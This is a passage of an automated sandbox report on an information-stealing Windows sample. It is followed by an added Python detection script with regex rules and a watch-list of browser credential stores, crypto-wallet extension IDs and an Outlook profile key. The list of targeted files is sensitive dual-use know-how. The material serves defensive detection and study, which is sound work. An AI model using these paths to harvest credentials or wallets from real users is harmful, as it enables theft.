Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_07160121
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoEx,FormatMessageA, 0_2_07142CC6
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_07154ADB
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_07155047
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_0715FFF8
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_0715FD1A
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_0715FDA5
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_0715FC34
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_0715FC7F
Source: C:\Users\user\Desktop\file.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 0_2_0715F988
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AFDEAD GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_00AFDEAD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0712C990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle, 0_2_0712C990
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 21.2.hcMSmyGUCSEFc2FAKlzc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.zy4GXi5yvCrsiS0ulH8Z.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2116356968.0000000006588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4493848204.0000000006306000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3580, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Xfp4MT9n1IFhi1hjXC4bx59.zip, type: DROPPED
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\formhistory.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\places.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\signons.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match File source: Process Memory Space: file.exe PID: 3580, type: MEMORYSTR
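The file-open and registry-open lines above are the raw observation behind the stealer verdict: a single non-browser process (file.exe, PID 3580) reading Firefox's logins.json, signons.sqlite, places.sqlite and formhistory.sqlite, the profiles.ini of every Gecko-based client it knows (Firefox, Thunderbird, Cyberfox, BlackHawk), the Chrome "Local Extension Settings" / "Sync Extension Settings" LevelDB stores and IndexedDB of a fixed set of extensions, and the Outlook MAPI profile key. The Python below is an added example of turning that pattern into a detection; it is not part of this report, of Joe Sandbox, or of the sample. It assumes a Sysmon-like (pid, image, target) event stream (file reads of this kind are visible from a sandbox trace, EDR file-access telemetry or object-access auditing, not from default Sysmon), a constructed allow-list of browser and mail-client images, a watch-list of extension IDs copied from the report's paths (the report does not name them; only nkbihfbeogaeaoehlefnkodbefgpgknn is identified here, as the Chrome Web Store ID of MetaMask), and sample events constructed from this report's own paths.

```python
import re
from collections import defaultdict

# Assumption of this example: processes that legitimately own these stores.
# Anything else touching them is reported.
BROWSER_IMAGES = frozenset({"chrome.exe", "msedge.exe", "firefox.exe",
                            "thunderbird.exe", "outlook.exe"})

# Extension IDs copied from the report's Chrome "Extension Settings" paths.
# nkbihfbeogaeaoehlefnkodbefgpgknn is the Chrome Web Store ID of MetaMask; the
# others are kept opaque. Non-watch-listed extension stores are still reported.
WATCHLIST_EXTENSION_IDS = frozenset({
    "nkbihfbeogaeaoehlefnkodbefgpgknn",
    "hnfanknocfeofbddgcijnmhnfnkdnaad",
    "fnjhmkhhmkbjkkabndcnnogagogbneec",
    "cjelfplplebdjjenllpjcblmjkfcffne",
    "nanjmdknhkinifnkgdcggcfnhdaammmj",
})

# (category, pattern). A capturing group, where present, is the extension ID.
# key3.db/key4.db are the NSS key stores Firefox keeps next to logins.json.
RULES = [
    ("firefox_credentials", re.compile(
        r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(?:logins\.json|signons\.sqlite|key[34]\.db)$", re.I)),
    ("firefox_history_forms", re.compile(
        r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(?:places\.sqlite|formhistory\.sqlite)$", re.I)),
    ("gecko_profile_index", re.compile(
        r"\\(?:Mozilla\\Firefox|Thunderbird|8pecxstudios\\Cyberfox|NETGATE Technologies\\BlackHawk)\\profiles\.ini$", re.I)),
    ("chromium_extension_storage", re.compile(
        r"\\User Data\\[^\\]+\\(?:Local|Sync) Extension Settings\\([a-p]{32})\\", re.I)),
    ("chromium_extension_storage", re.compile(
        r"\\User Data\\[^\\]+\\IndexedDB\\chrome-extension_([a-p]{32})_\d+\.indexeddb\.leveldb\\", re.I)),
    ("outlook_mapi_profile", re.compile(
        r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\", re.I)),
]


def classify(target):
    """Return (category, extension_id) for a file or registry path, or (None, None)."""
    for category, pattern in RULES:
        m = pattern.search(target)
        if m:
            ext_id = m.group(1).lower() if m.groups() else None
            return category, ext_id
    return None, None


def detect(events):
    """Aggregate credential-store hits per (pid, image) for non-browser processes.

    Severity is 'high' when the process read a password store or a watch-listed
    extension's storage, 'medium' for history/forms/profile-index reads only.
    """
    hits = defaultdict(lambda: {"categories": set(), "extensions": set(), "count": 0})
    for ev in events:
        category, ext_id = classify(ev["target"])
        if category is None:
            continue
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if image in BROWSER_IMAGES:          # the store's legitimate owner
            continue
        rec = hits[(ev["pid"], image)]
        rec["categories"].add(category)
        rec["count"] += 1
        if ext_id:
            rec["extensions"].add(ext_id)

    alerts = []
    for (pid, image), rec in sorted(hits.items()):
        watched = rec["extensions"] & WATCHLIST_EXTENSION_IDS
        high = "firefox_credentials" in rec["categories"] or bool(watched)
        alerts.append({
            "pid": pid, "image": image, "events": rec["count"],
            "categories": sorted(rec["categories"]),
            "watchlisted_extensions": sorted(watched),
            "severity": "high" if high else "medium",
        })
    return alerts


# Constructed sample events mirroring the report's paths (not a captured trace).
_U = r"C:\Users\user"
_MAL = _U + r"\Desktop\file.exe"
SAMPLE_EVENTS = [
    {"pid": 3580, "image": _MAL, "target": _U + r"\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json"},
    {"pid": 3580, "image": _MAL, "target": _U + r"\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\signons.sqlite"},
    {"pid": 3580, "image": _MAL, "target": _U + r"\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\places.sqlite"},
    {"pid": 3580, "image": _MAL, "target": _U + r"\AppData\Roaming\Thunderbird\profiles.ini"},
    {"pid": 3580, "image": _MAL, "target": _U + r"\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT"},
    {"pid": 3580, "image": _MAL, "target": _U + r"\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT"},
    {"pid": 3580, "image": _MAL, "target": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    # Benign: the browser reading its own store, and an unrelated file open.
    {"pid": 4120, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": _U + r"\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT"},
    {"pid": 5000, "image": r"C:\Windows\explorer.exe", "target": _U + r"\Documents\notes.txt"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The allow-list keeps the browser's own reads out of the alert stream; the value of the rule is the combination of several categories hit by one process within a short window, which is exactly what the report lists for PID 3580 and which a single benign process has no reason to do.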

Remote Access Functionality

Source: Yara match File source: 00000000.00000003.2116356968.0000000006588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4493848204.0000000006306000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3580, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Xfp4MT9n1IFhi1hjXC4bx59.zip, type: DROPPED